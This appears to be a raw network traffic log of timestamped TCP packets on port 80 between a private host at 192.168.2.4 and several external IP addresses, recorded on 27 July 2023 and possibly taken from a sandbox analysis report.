                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:23.061501980 CEST5009880192.168.2.4172.67.70.22
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:23.061513901 CEST8050098172.67.70.22192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:23.061551094 CEST8050098172.67.70.22192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:23.061559916 CEST5009880192.168.2.4172.67.70.22
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:23.061604977 CEST5009880192.168.2.4172.67.70.22
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:23.062304974 CEST8050098172.67.70.22192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:23.062341928 CEST8050098172.67.70.22192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:23.062367916 CEST5009880192.168.2.4172.67.70.22
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:23.062378883 CEST8050098172.67.70.22192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:23.062386990 CEST4980780192.168.2.4185.80.51.179
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:23.062395096 CEST5009880192.168.2.4172.67.70.22
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:23.062417030 CEST8050098172.67.70.22192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:23.062433004 CEST5009880192.168.2.4172.67.70.22
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:23.062453985 CEST8050098172.67.70.22192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:23.062463045 CEST5009880192.168.2.4172.67.70.22
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:23.062505007 CEST5009880192.168.2.4172.67.70.22
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:23.063118935 CEST8050098172.67.70.22192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:23.063157082 CEST8050098172.67.70.22192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:23.063191891 CEST8050098172.67.70.22192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:23.063196898 CEST5009880192.168.2.4172.67.70.22
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:23.063224077 CEST5009880192.168.2.4172.67.70.22
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:23.063229084 CEST8050098172.67.70.22192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:23.063256979 CEST5009880192.168.2.4172.67.70.22
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:23.063271046 CEST5011580192.168.2.4185.80.51.179
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:23.063282967 CEST5009880192.168.2.4172.67.70.22
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:23.063296080 CEST8050098172.67.70.22192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:23.063343048 CEST5009880192.168.2.4172.67.70.22
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:23.064053059 CEST8050098172.67.70.22192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:23.064099073 CEST8050098172.67.70.22192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:23.064109087 CEST5009880192.168.2.4172.67.70.22
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:23.064132929 CEST8050098172.67.70.22192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:23.064136028 CEST5009880192.168.2.4172.67.70.22
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:23.064182997 CEST5009880192.168.2.4172.67.70.22
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:23.064196110 CEST8050098172.67.70.22192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:23.064238071 CEST5009880192.168.2.4172.67.70.22
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:23.064239979 CEST8050098172.67.70.22192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:23.064290047 CEST5009880192.168.2.4172.67.70.22
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:23.064841986 CEST8050098172.67.70.22192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:23.064877033 CEST8050098172.67.70.22192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:23.064903021 CEST5009880192.168.2.4172.67.70.22
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:23.064933062 CEST5009880192.168.2.4172.67.70.22
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:23.064948082 CEST8050098172.67.70.22192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:23.064990997 CEST5009880192.168.2.4172.67.70.22
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:23.064991951 CEST8050098172.67.70.22192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:23.065027952 CEST8050098172.67.70.22192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:23.065033913 CEST5009880192.168.2.4172.67.70.22
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:23.065074921 CEST5009880192.168.2.4172.67.70.22
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:23.065737009 CEST8050098172.67.70.22192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:23.065777063 CEST8050098172.67.70.22192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:23.065810919 CEST5009880192.168.2.4172.67.70.22
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:23.065839052 CEST8050098172.67.70.22192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:23.065840960 CEST5009880192.168.2.4172.67.70.22
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:23.065881014 CEST5009880192.168.2.4172.67.70.22
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:23.065881968 CEST8050098172.67.70.22192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:23.065917015 CEST8050098172.67.70.22192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:23.065946102 CEST5009880192.168.2.4172.67.70.22
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:23.065963984 CEST5009880192.168.2.4172.67.70.22
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:23.066607952 CEST8050098172.67.70.22192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:23.066637993 CEST8050098172.67.70.22192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:23.066667080 CEST8050098172.67.70.22192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:23.066673994 CEST5009880192.168.2.4172.67.70.22
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:23.066694021 CEST8050098172.67.70.22192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:23.066694021 CEST5009880192.168.2.4172.67.70.22
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:23.066704988 CEST5009880192.168.2.4172.67.70.22
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:23.066724062 CEST8050098172.67.70.22192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:23.066737890 CEST5009880192.168.2.4172.67.70.22
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:23.066765070 CEST5009880192.168.2.4172.67.70.22
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:23.067471027 CEST8050098172.67.70.22192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:23.067502022 CEST8050098172.67.70.22192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:23.067528963 CEST8050098172.67.70.22192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:23.067539930 CEST5009880192.168.2.4172.67.70.22
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:23.067557096 CEST8050098172.67.70.22192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:23.067565918 CEST5009880192.168.2.4172.67.70.22
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:23.067585945 CEST8050098172.67.70.22192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:23.067606926 CEST5009880192.168.2.4172.67.70.22
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:23.067636013 CEST5009880192.168.2.4172.67.70.22
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:23.068228960 CEST8050098172.67.70.22192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:23.068293095 CEST5009880192.168.2.4172.67.70.22
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:23.068310976 CEST8050098172.67.70.22192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:23.068346977 CEST8050098172.67.70.22192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:23.068356037 CEST5009880192.168.2.4172.67.70.22
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:23.068375111 CEST8050098172.67.70.22192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:23.068396091 CEST5009880192.168.2.4172.67.70.22
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:23.068408012 CEST8050098172.67.70.22192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:23.068419933 CEST5009880192.168.2.4172.67.70.22
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:23.068449020 CEST5009880192.168.2.4172.67.70.22
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:23.069011927 CEST8050098172.67.70.22192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:23.069078922 CEST8050098172.67.70.22192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:23.069092989 CEST8050098172.67.70.22192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:23.069119930 CEST8050098172.67.70.22192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:23.069150925 CEST8050098172.67.70.22192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:23.069192886 CEST5009880192.168.2.4172.67.70.22
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:23.069200993 CEST8050098172.67.70.22192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:23.069245100 CEST5009880192.168.2.4172.67.70.22
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:23.069287062 CEST5009880192.168.2.4172.67.70.22
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:23.069962025 CEST8050098172.67.70.22192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:23.070010900 CEST8050098172.67.70.22192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:23.070041895 CEST8050098172.67.70.22192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:23.070070028 CEST8050098172.67.70.22192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:23.070096970 CEST8050098172.67.70.22192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:23.070125103 CEST8050098172.67.70.22192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:23.070147991 CEST5009880192.168.2.4172.67.70.22
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:23.070236921 CEST5009880192.168.2.4172.67.70.22
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:23.070794106 CEST8050098172.67.70.22192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:23.070847034 CEST8050098172.67.70.22192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:23.070897102 CEST8050098172.67.70.22192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:23.070947886 CEST8050098172.67.70.22192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:23.070952892 CEST5009880192.168.2.4172.67.70.22
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:23.070977926 CEST8050098172.67.70.22192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:23.070991993 CEST5009880192.168.2.4172.67.70.22
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:23.071007013 CEST8050098172.67.70.22192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:23.071038008 CEST5009880192.168.2.4172.67.70.22
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:23.071062088 CEST5009880192.168.2.4172.67.70.22
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:23.071690083 CEST8050098172.67.70.22192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:23.071748972 CEST8050098172.67.70.22192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:23.071779013 CEST8050098172.67.70.22192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:23.071805954 CEST8050098172.67.70.22192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:23.071834087 CEST8050098172.67.70.22192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:23.071861982 CEST8050098172.67.70.22192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:23.071887016 CEST5009880192.168.2.4172.67.70.22
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:23.071890116 CEST8050098172.67.70.22192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:23.071930885 CEST5009880192.168.2.4172.67.70.22
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:23.071930885 CEST5009880192.168.2.4172.67.70.22
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:23.071949005 CEST5009880192.168.2.4172.67.70.22
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:23.072590113 CEST8050098172.67.70.22192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:23.072623014 CEST8050098172.67.70.22192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:23.072649956 CEST8050098172.67.70.22192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:23.072678089 CEST8050098172.67.70.22192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:23.072707891 CEST8050098172.67.70.22192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:23.072735071 CEST8050098172.67.70.22192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:23.072761059 CEST5009880192.168.2.4172.67.70.22
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:23.072763920 CEST8050098172.67.70.22192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:23.072791100 CEST5009880192.168.2.4172.67.70.22
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:23.072818041 CEST5009880192.168.2.4172.67.70.22
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:23.073539019 CEST8050098172.67.70.22192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:23.073600054 CEST8050098172.67.70.22192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:23.073628902 CEST8050098172.67.70.22192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:23.073718071 CEST5009880192.168.2.4172.67.70.22
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:23.073785067 CEST5009880192.168.2.4172.67.70.22
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:23.073987007 CEST8050098172.67.70.22192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:23.074023962 CEST8050098172.67.70.22192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:23.074114084 CEST8050098172.67.70.22192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:23.074143887 CEST5009880192.168.2.4172.67.70.22
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:23.074145079 CEST8050098172.67.70.22192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:23.074172974 CEST8050098172.67.70.22192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:23.074182987 CEST5009880192.168.2.4172.67.70.22
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:23.074202061 CEST8050098172.67.70.22192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:23.074217081 CEST5009880192.168.2.4172.67.70.22
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:23.074229956 CEST8050098172.67.70.22192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:23.074245930 CEST5009880192.168.2.4172.67.70.22
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:23.074269056 CEST5009880192.168.2.4172.67.70.22
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:23.074531078 CEST8049813188.165.133.163192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:23.074598074 CEST4981380192.168.2.4188.165.133.163
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:23.074954987 CEST8050098172.67.70.22192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:23.075023890 CEST8050098172.67.70.22192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:23.075061083 CEST8050098172.67.70.22192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:23.075087070 CEST8050098172.67.70.22192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:23.075115919 CEST8050098172.67.70.22192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:23.075136900 CEST5009880192.168.2.4172.67.70.22
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:23.075144053 CEST8050098172.67.70.22192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:23.075172901 CEST8050098172.67.70.22192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:23.075176001 CEST5009880192.168.2.4172.67.70.22
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:23.075203896 CEST5009880192.168.2.4172.67.70.22
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:23.075229883 CEST5009880192.168.2.4172.67.70.22
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:23.076008081 CEST8050098172.67.70.22192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:23.076072931 CEST8050098172.67.70.22192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:23.076111078 CEST8050098172.67.70.22192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:23.076144934 CEST8050098172.67.70.22192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:23.076174974 CEST8050098172.67.70.22192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:23.076189041 CEST5009880192.168.2.4172.67.70.22
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:23.076204062 CEST8050098172.67.70.22192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:23.076214075 CEST5009880192.168.2.4172.67.70.22
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:23.076230049 CEST8050098172.67.70.22192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:23.076232910 CEST5009880192.168.2.4172.67.70.22
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:23.076255083 CEST8050114188.165.133.163192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:23.076257944 CEST5009880192.168.2.4172.67.70.22
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:23.076296091 CEST5009880192.168.2.4172.67.70.22
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:23.076329947 CEST5011480192.168.2.4188.165.133.163
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:23.076879978 CEST8050098172.67.70.22192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:23.076909065 CEST8050098172.67.70.22192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:23.076931953 CEST8050098172.67.70.22192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:23.076961040 CEST8050098172.67.70.22192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:23.076991081 CEST8050098172.67.70.22192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:23.077013969 CEST8050098172.67.70.22192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:23.077035904 CEST5009880192.168.2.4172.67.70.22
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:23.077035904 CEST8050098172.67.70.22192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:23.077053070 CEST5009880192.168.2.4172.67.70.22
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:23.077059984 CEST8050098172.67.70.22192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:23.077081919 CEST8050098172.67.70.22192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:23.077089071 CEST5009880192.168.2.4172.67.70.22
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:23.077105045 CEST8050098172.67.70.22192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:23.077115059 CEST5009880192.168.2.4172.67.70.22
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:23.077140093 CEST5009880192.168.2.4172.67.70.22
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:23.077807903 CEST8050098172.67.70.22192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:23.077836037 CEST8050098172.67.70.22192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:23.077858925 CEST8050098172.67.70.22192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:23.077879906 CEST8050098172.67.70.22192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:23.077900887 CEST8050098172.67.70.22192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:23.077965975 CEST5009880192.168.2.4172.67.70.22
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:23.077967882 CEST5009880192.168.2.4172.67.70.22
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:23.077967882 CEST5009880192.168.2.4172.67.70.22
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:23.077967882 CEST5009880192.168.2.4172.67.70.22
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:23.077967882 CEST5009880192.168.2.4172.67.70.22
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:23.078053951 CEST8050098172.67.70.22192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:23.078078032 CEST8050098172.67.70.22192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:23.078099012 CEST5009880192.168.2.4172.67.70.22
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:23.078100920 CEST8050098172.67.70.22192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:23.078110933 CEST5009880192.168.2.4172.67.70.22
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:23.078123093 CEST8050098172.67.70.22192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:23.078140020 CEST5009880192.168.2.4172.67.70.22
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:23.078145027 CEST8050098172.67.70.22192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:23.078164101 CEST5009880192.168.2.4172.67.70.22
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:23.078182936 CEST5009880192.168.2.4172.67.70.22
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:23.078645945 CEST5011480192.168.2.4188.165.133.163
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:23.078696012 CEST8050098172.67.70.22192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:23.078726053 CEST8050098172.67.70.22192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:23.078757048 CEST8050098172.67.70.22192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:23.078787088 CEST8050098172.67.70.22192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:23.078815937 CEST8050098172.67.70.22192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:23.078840017 CEST8050098172.67.70.22192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:23.078859091 CEST5009880192.168.2.4172.67.70.22
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:23.078860998 CEST8050098172.67.70.22192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:23.078875065 CEST5009880192.168.2.4172.67.70.22
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:23.078882933 CEST8050098172.67.70.22192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:23.078905106 CEST8050098172.67.70.22192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:23.078915119 CEST5009880192.168.2.4172.67.70.22
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:23.078915119 CEST5009880192.168.2.4172.67.70.22
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:23.078927040 CEST8050098172.67.70.22192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:23.078942060 CEST5009880192.168.2.4172.67.70.22
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:23.078958988 CEST5009880192.168.2.4172.67.70.22
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:23.079612017 CEST8050098172.67.70.22192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:23.079643965 CEST8050098172.67.70.22192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:23.079668045 CEST8050098172.67.70.22192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:23.079695940 CEST8050098172.67.70.22192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:23.079718113 CEST8050098172.67.70.22192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:23.079840899 CEST8050098172.67.70.22192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:23.079863071 CEST8050098172.67.70.22192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:23.079885960 CEST8050098172.67.70.22192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:23.079906940 CEST8050098172.67.70.22192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:23.079922915 CEST5009880192.168.2.4172.67.70.22
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:23.079926014 CEST8050098172.67.70.22192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:23.079945087 CEST5009880192.168.2.4172.67.70.22
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:23.079966068 CEST5009880192.168.2.4172.67.70.22
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:23.080138922 CEST8050102170.82.174.30192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:23.085299015 CEST8050111202.254.236.40192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:23.086860895 CEST8050111202.254.236.40192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:23.086915970 CEST5011180192.168.2.4202.254.236.40
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:23.098360062 CEST8050114188.165.133.163192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:23.098408937 CEST8050114188.165.133.163192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:23.098474979 CEST5011480192.168.2.4188.165.133.163
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:23.100579977 CEST8049807185.80.51.179192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:23.101524115 CEST8050115185.80.51.179192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:23.101643085 CEST5011580192.168.2.4185.80.51.179
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:23.137218952 CEST805011254.209.32.212192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:23.137406111 CEST5011280192.168.2.454.209.32.212
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:23.228832960 CEST8050102170.82.174.30192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:23.228964090 CEST5010280192.168.2.4170.82.174.30
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:23.249372005 CEST5011580192.168.2.4185.80.51.179
